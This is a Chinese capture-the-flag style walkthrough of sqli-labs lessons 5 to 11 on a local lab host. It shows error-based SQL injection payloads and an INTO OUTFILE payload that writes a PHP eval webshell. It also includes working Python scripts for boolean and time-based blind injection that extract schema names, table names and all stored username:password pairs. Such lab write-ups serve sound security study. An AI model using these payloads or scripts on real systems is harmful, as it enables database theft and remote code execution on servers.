5&6 子查询注入
有mysql的错误显示
本质是 floor(rand()*2) 与 group by 组合时,MySQL 向临时表插入分组键发生主键重复(Duplicate entry)而报错,错误信息里带出了拼接进去的查询结果。注意下面的 payload 用的是无种子的 rand(),报错是概率性的,没有返回报错就重发一次;换成 rand(0) 可以稳定触发(要求 from 后面的表至少有 3 行,information_schema.tables 一般足够)。
参考文章:https://www.cnblogs.com/BloodZero/p/4660971.html
payload1:查询库名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key'
payload2:查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1242 (21000): Subquery returns more than 1 row
这里提示说结果子查询超出一行,确认问题是处在这里
payload3:用limit一个一个查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key'
payload4:查询列名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key'
payload:查询内容
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'
6与5差别在单引号和双引号payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(*),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+
7 利用文件写入一句话木马
首先吐槽一下这里的闭合方式,试了半天没办法看代码才知道,两个括号。。。
这一题需要用sql语句来进行文件操作。
需要用到 select 'xxx' into outfile 'xxx'; 来写文件。前提是当前数据库账号拥有 FILE 权限,且 secure_file_priv 为空或者包含目标目录(很多默认配置下是禁止写到 web 目录的),否则语句会直接报错。
outfile 需要文件的绝对路径,而我们通常只能凭经验猜测 web 根目录。
根据系统和数据库猜测,如winserver的iis默认路径是c:/inetpub/wwwroot/,这好像说偏了,这是asp的,但知道也好
linux 的 nginx 一般是 /usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/html 等
apache 一般是 /var/www/html,/var/www/html/htdocs 等。payload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+ (注意这里写入的是没有任何认证的 eval 一句话,只应在自己的靶机上使用,做完记得删除。)
8 布尔盲注
就是相比第五题关闭了报错显示
分析一下语句:SELECT * FROM users WHERE id='1'and ((select database())='secrity')-- ' LIMIT 0,1
无报错,根据是否返回you are in...来判断sql执行结果
那么找到可以执行的语句
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200);
Empty set (0.00 sec)
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
附上脚本
import requests
from tqdm import tqdm
import time
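def bp(name, payload, oracle=None, timeout=30):
    """Recover a string through a boolean-based blind SQL injection oracle.

    ``payload`` is a query-string template with two ``{}`` slots that are
    filled with the 1-based character position and an ASCII threshold; the
    injected condition must hold exactly when ``ascii(char) > threshold``
    (e.g. ``'?id=1%27and%20(ascii(mid(database(),{},1))>{})%23'``).  Each
    character is pinned by a binary search over the printable range, so
    roughly seven requests per character plus one end-of-string probe.

    Args:
        name: already recovered prefix; recovered characters are appended.
        payload: template described above.
        oracle: ``callable(query_string) -> bool``; True when the injected
            condition was true.  Defaults to ``GET url + query_string`` on the
            module-level ``url`` and testing the body for "You are in...".
        timeout: socket timeout (seconds) for the default oracle.  The
            original issued requests without one, so a stalled connection
            hung the extraction forever.

    Returns:
        ``name`` plus the recovered characters.  Extraction ends at the first
        position whose character has ASCII 0 (MySQL ``mid()`` past the end of
        the string returns '' and ``ascii('')`` is 0) or after 199
        characters.  The old stop rule ("two equal characters in a row")
        truncated real data at any doubled letter ('ll', 'ss', ...); this
        replaces it.  Characters outside 32..127 (tabs, multibyte) cannot be
        represented and come back as the nearest window edge.
    """
    if oracle is None:
        def oracle(query):
            rsp = requests.get(url=url + query, timeout=timeout)
            rsp.encoding = "utf-8"
            return "You are in..." in rsp.text

    for pos in range(1, 200):
        # End-of-string probe: ascii(mid(s, pos, 1)) > 0 is false only when
        # the position lies past the end (or the value is NULL / NUL).
        if not oracle(payload.format(pos, 0)):
            break
        # Invariant: lo < ascii(char) <= hi.  Starting at (31, 127] covers
        # printable ASCII including space (the original window started at
        # 33 and mis-decoded a space as '"').
        lo, hi = 31, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(payload.format(pos, mid)):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)  # progress: partial result so far
    return name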
# Target: sqli-labs Less-8 (boolean blind) on a local lab host.
url = "http://sql.test/Less-8/"
databasename = ""
tablename = ""

t1 = time.time()
# Step 1: current schema name via ascii(mid(database(), pos, 1)) > threshold.
payload1 = '?id=1%27and%20(ascii(mid(database(),{},1))>{})%23'
databasename = bp(databasename, payload1)
# Step 2: comma-joined table names of that schema; the recovered schema
# name is spliced into the template before bp() fills the {} slots.
payload2 = (
    "?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20"
    "information_schema.tables%20where%20table_schema='"
    + databasename
    + "'),{},1))>{})%23"
)
tablename = bp(tablename, payload2)
t2 = time.time()
print("总共时长为:", t2 - t1, sep="\n")
print(databasename, tablename, sep="\n")
#下面是第二个脚本
import requests
from tqdm import tqdm
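def bp(name, payload, oracle=None, timeout=30):
    """Recover a string through a boolean-based blind SQL injection oracle.

    ``payload`` is a query-string template with two ``{}`` slots that are
    filled with the 1-based character position and an ASCII threshold; the
    injected condition must hold exactly when ``ascii(char) > threshold``.
    Each character is pinned by a binary search over the printable range,
    so roughly seven requests per character plus one end-of-string probe.

    Args:
        name: already recovered prefix; recovered characters are appended.
        payload: template described above.
        oracle: ``callable(query_string) -> bool``; True when the injected
            condition was true.  Defaults to ``GET url + query_string`` on the
            module-level ``url`` and testing the body for "You are in...".
        timeout: socket timeout (seconds) for the default oracle.  The
            original issued requests without one, so a stalled connection
            hung the extraction forever.

    Returns:
        ``name`` plus the recovered characters.  Extraction ends at the first
        position whose character has ASCII 0 (MySQL ``mid()`` past the end of
        the string returns '' and ``ascii('')`` is 0) or after 199
        characters.  The old stop rule ("two equal characters in a row")
        truncated real data at any doubled letter -- fatal for a dump of
        username:password pairs, where 'll' or 'ss' is common; this replaces
        it.  Characters outside 32..127 cannot be represented and come back
        as the nearest window edge.
    """
    if oracle is None:
        def oracle(query):
            rsp = requests.get(url=url + query, timeout=timeout)
            rsp.encoding = "utf-8"
            return "You are in..." in rsp.text

    for pos in range(1, 200):
        # End-of-string probe: ascii(mid(s, pos, 1)) > 0 is false only when
        # the position lies past the end (or the value is NULL / NUL).
        if not oracle(payload.format(pos, 0)):
            break
        # Invariant: lo < ascii(char) <= hi.  Starting at (31, 127] covers
        # printable ASCII including space (the original window started at
        # 33 and mis-decoded a space as '"').
        lo, hi = 31, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(payload.format(pos, mid)):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)  # progress: partial result so far
    return name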
# Target: sqli-labs Less-8 (boolean blind), same lab host as above.
url = "http://sql.test/Less-8/"
usernamepassword = ""
# Every username:password pair of the users table in one string, rows
# joined with a literal '<br>' so they are easy to split afterwards.
payload3 = (
    "?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password"
    "%20separator%20'<br>')%20from%20users),{},1))>{})%23"
)
usernamepassword = bp(usernamepassword, payload3)
print(usernamepassword)
9 时间盲注
看一下源码,不论sql查询语句的结果是否为空都返回you are in...
想办法构造一下payload,测试成功:?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+ (sleep 的时长要和脚本里判定延时的阈值配套,并给网络抖动留出余量,否则会误判字符。)
import requests
from tqdm import tqdm
import time
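def bp(name, payload, oracle=None, delay=5, timeout=60):
    """Recover a string through a time-based blind SQL injection oracle.

    ``payload`` is a query-string template with two ``{}`` slots, filled with
    the 1-based character position and an ASCII threshold; the injected
    ``if()`` must sleep exactly when ``ascii(char) > threshold`` (e.g.
    ``'?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'``).
    Each character is pinned by a binary search over the printable range,
    about seven requests per character plus one end-of-string probe.

    Args:
        name: already recovered prefix; recovered characters are appended.
        payload: template described above.
        oracle: ``callable(query_string) -> bool``; True when the condition
            held.  Defaults to ``GET url + query_string`` on the module-level
            ``url`` and reporting True when the round trip took longer than
            ``delay`` seconds.
        delay: threshold in seconds for the default oracle (5, as in the
            original).  NOTE(review): the payloads in this file inject
            sleep(0.3); whether that accumulates past 5 s depends on how many
            rows the injected if() is evaluated for -- verify against your
            target.  Keep the threshold well above the normal response time,
            otherwise network jitter turns into wrong characters.
        timeout: socket timeout for the default oracle; must stay larger
            than ``delay`` or a genuine hit raises a ``requests`` Timeout.
            The original sent requests with no timeout at all.

    Returns:
        ``name`` plus the recovered characters.  Extraction ends at the first
        position whose character has ASCII 0 (MySQL ``mid()`` past the end
        returns '' and ``ascii('')`` is 0) or after 199 characters.  The old
        stop rule ("two equal characters in a row") truncated real data at
        any doubled letter ('ll', 'ss', ...); this replaces it.  Characters
        outside 32..127 cannot be represented and come back as the nearest
        window edge.
    """
    if oracle is None:
        def oracle(query):
            started = time.perf_counter()
            requests.get(url=url + query, timeout=timeout)
            return time.perf_counter() - started > delay

    for pos in range(1, 200):
        # End-of-string probe: ascii(mid(s, pos, 1)) > 0 is false only when
        # the position lies past the end (or the value is NULL / NUL).
        if not oracle(payload.format(pos, 0)):
            break
        # Invariant: lo < ascii(char) <= hi.  Starting at (31, 127] covers
        # printable ASCII including space (the original window started at
        # 33 and mis-decoded a space as '"').
        lo, hi = 31, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(payload.format(pos, mid)):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)  # progress: partial result so far
    return name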
# Target: sqli-labs Less-9 (time-based blind).
url = "http://sql.test/Less-9/"
# The schema name was recovered earlier with
#   '?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
# and is hard-coded here to skip that slow step on reruns.
databasename = 'security'
tablename = ''
# Comma-joined table names of that schema; the if() only sleeps when the
# comparison is true, which is what bp() measures.
payload2 = (
    "?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20"
    "information_schema.tables%20where%20table_schema='"
    + databasename
    + "'),{},1))>{}),sleep(0.3),0)--+"
)
tablename = bp(tablename, payload2)
#下面是求字段的脚本
#这里的payload写了好久,太长了容易看错,需要仔细一点
import requests
import time
from tqdm import tqdm
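def bp(name, payload, oracle=None, delay=5, timeout=60):
    """Recover a string through a time-based blind SQL injection oracle.

    ``payload`` is a query-string template with two ``{}`` slots, filled with
    the 1-based character position and an ASCII threshold; the injected
    ``if()`` must sleep exactly when ``ascii(char) > threshold``.  Each
    character is pinned by a binary search over the printable range, about
    seven requests per character plus one end-of-string probe.

    Args:
        name: already recovered prefix; recovered characters are appended.
        payload: template described above.
        oracle: ``callable(query_string) -> bool``; True when the condition
            held.  Defaults to ``GET url + query_string`` on the module-level
            ``url`` and reporting True when the round trip took longer than
            ``delay`` seconds.
        delay: threshold in seconds for the default oracle (5, as in the
            original).  NOTE(review): the payloads in this file inject
            sleep(0.3); whether that accumulates past 5 s depends on how many
            rows the injected if() is evaluated for -- verify against your
            target.  Keep the threshold well above the normal response time,
            otherwise network jitter turns into wrong characters.
        timeout: socket timeout for the default oracle; must stay larger
            than ``delay`` or a genuine hit raises a ``requests`` Timeout.
            The original sent requests with no timeout at all.

    Returns:
        ``name`` plus the recovered characters.  Extraction ends at the first
        position whose character has ASCII 0 (MySQL ``mid()`` past the end
        returns '' and ``ascii('')`` is 0) or after 199 characters.  The old
        stop rule ("two equal characters in a row") truncated real data at
        any doubled letter -- fatal for a dump of username:password pairs;
        this replaces it.  Characters outside 32..127 cannot be represented
        and come back as the nearest window edge.
    """
    if oracle is None:
        def oracle(query):
            started = time.perf_counter()
            requests.get(url=url + query, timeout=timeout)
            return time.perf_counter() - started > delay

    for pos in range(1, 200):
        # End-of-string probe: ascii(mid(s, pos, 1)) > 0 is false only when
        # the position lies past the end (or the value is NULL / NUL).
        if not oracle(payload.format(pos, 0)):
            break
        # Invariant: lo < ascii(char) <= hi.  Starting at (31, 127] covers
        # printable ASCII including space (the original window started at
        # 33 and mis-decoded a space as '"').
        lo, hi = 31, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(payload.format(pos, mid)):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)  # progress: partial result so far
    return name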
# Target: sqli-labs Less-9 (time-based blind).
url = "http://sql.test/Less-9/"
usernamepassword = ""
# All username:password pairs, rows joined with a literal '<br>'.  Spaces
# are left unencoded here; requests percent-encodes them before sending.
# The template is long and easy to mis-type -- check that every '(' is
# closed before running it.
payload3 = (
    "?id=0%27or%20if((ascii(mid((select group_concat(username,':',password"
    " separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+"
)
usernamepassword = bp(usernamepassword, payload3)
print(usernamepassword)
10
相比于第九题将单引号改成了双引号
import requests
from tqdm import tqdm
import time
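def bp(name, payload, oracle=None, delay=5, timeout=60):
    """Recover a string through a time-based blind SQL injection oracle.

    ``payload`` is a query-string template with two ``{}`` slots, filled with
    the 1-based character position and an ASCII threshold; the injected
    ``if()`` must sleep exactly when ``ascii(char) > threshold`` (e.g.
    ``'?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'``).
    Each character is pinned by a binary search over the printable range,
    about seven requests per character plus one end-of-string probe.

    Args:
        name: already recovered prefix; recovered characters are appended.
        payload: template described above.
        oracle: ``callable(query_string) -> bool``; True when the condition
            held.  Defaults to ``GET url + query_string`` on the module-level
            ``url`` and reporting True when the round trip took longer than
            ``delay`` seconds.
        delay: threshold in seconds for the default oracle (5, as in the
            original).  NOTE(review): the payloads in this file inject
            sleep(0.3); whether that accumulates past 5 s depends on how many
            rows the injected if() is evaluated for -- verify against your
            target.  Keep the threshold well above the normal response time,
            otherwise network jitter turns into wrong characters.
        timeout: socket timeout for the default oracle; must stay larger
            than ``delay`` or a genuine hit raises a ``requests`` Timeout.
            The original sent requests with no timeout at all.

    Returns:
        ``name`` plus the recovered characters.  Extraction ends at the first
        position whose character has ASCII 0 (MySQL ``mid()`` past the end
        returns '' and ``ascii('')`` is 0) or after 199 characters.  The old
        stop rule ("two equal characters in a row") truncated real data at
        any doubled letter ('ll', 'ss', ...); this replaces it.  Characters
        outside 32..127 cannot be represented and come back as the nearest
        window edge.
    """
    if oracle is None:
        def oracle(query):
            started = time.perf_counter()
            requests.get(url=url + query, timeout=timeout)
            return time.perf_counter() - started > delay

    for pos in range(1, 200):
        # End-of-string probe: ascii(mid(s, pos, 1)) > 0 is false only when
        # the position lies past the end (or the value is NULL / NUL).
        if not oracle(payload.format(pos, 0)):
            break
        # Invariant: lo < ascii(char) <= hi.  Starting at (31, 127] covers
        # printable ASCII including space (the original window started at
        # 33 and mis-decoded a space as '"').
        lo, hi = 31, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(payload.format(pos, mid)):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)  # progress: partial result so far
    return name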
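# Target: sqli-labs Less-10 (time-based blind, id closed with a double quote).
url = "http://sql.test/Less-10/"
databasename = ''
tablename = ''
# Schema name via ascii(mid(database(), pos, 1)) > threshold inside a
# time-based if().  The recovered value is overwritten with 'security' right
# below; the call is kept so the request sequence matches the original.
payload1 = '?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
databasename = bp(databasename, payload1)
databasename = 'security'
# Table names of that schema.  Bug fix: the original wrote this template as
#   '...table_schema=' "+databasename+" '),{},1))>...'
# -- three adjacent string literals -- so the literal text `+databasename+`
# went into the query instead of the schema name and nothing ever matched.
payload2 = (
    '?id=0"or%20if((ascii(mid((select%20group_concat(table_name)%20from%20'
    "information_schema.tables%20where%20table_schema='"
    + databasename
    + "'),{},1))>{}),sleep(0.3),0)--+"
)
tablename = bp(tablename, payload2)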
#下面是求字段的脚本
# import requests
# import time
# from tqdm import tqdm
#
# def bp(name,payload):
# for j in tqdm(range(1, 200)):
# min = 33
# max = 127
# while abs(min - max) > 1: # s
# mid = int((min + max) * 0.5)
# payloadd = payload.format(str(j), str(mid))
# t1 = time.time()
# rsp = requests.get(url=url + payloadd)
# rsp.encoding = 'utf-8'
# t2 = time.time()
# if (t2 - t1 > 5):
# min = mid
# else:
# max = mid
# # print(str(min)+"-"+str(max))
# name += chr(max)
# print(name)
# if(name[-1:]==name[-2:-1]):
# break
# return name
#
# url="http://sql.test/Less-9/"
# usernamepassword=""
# # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
# payload3 ='?id=0"or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+'
# usernamepassword=bp(usernamepassword,payload3)
# print(usernamepassword)
11 报错注入
非标准解法